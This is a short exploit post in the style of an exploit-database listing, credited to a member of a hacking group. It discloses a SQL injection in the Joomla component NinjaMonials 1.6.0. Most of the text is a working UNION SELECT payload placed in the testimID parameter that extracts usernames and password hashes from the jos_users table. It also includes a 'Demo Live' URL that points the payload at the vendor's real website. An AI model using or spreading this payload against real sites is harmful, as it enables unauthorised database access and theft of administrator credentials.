---------------------------------------------------------------------- Joomla Component com_ninjamonial (testimID) SQL injection Vulnerability ---------------------------------------------------------------------- ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Group : LatinHackTeam [+] Vulnerability : SQL injection ################################################### Information: Name : NinjaMonials - Testimonials Manager. Version : 1.6.0 Date : Aug 2009 Licence : GLP Type : Comercial Compatibility : 1.5 Native web : http://www.ninjaforge.com more info & demo : http://ninjaforge.com/index.php?option=com_ninjacentral&page=show_package&id=56&Itemid=245 -------------------------------------------------------------------- Example: http://localhost/path/index.php?option=com_ninjamonials&task=display&testimID=n n: Valid testimID : +and+1=2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+from+jos_users Demo Live: http://www.ninjaforge.com/index.php?option=com_ninjamonials&task=display&testimID=3+and+1=2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+from+jos_users +++++++++++++++++++++++++++++++++ [!] Produced in South America ---------------------------------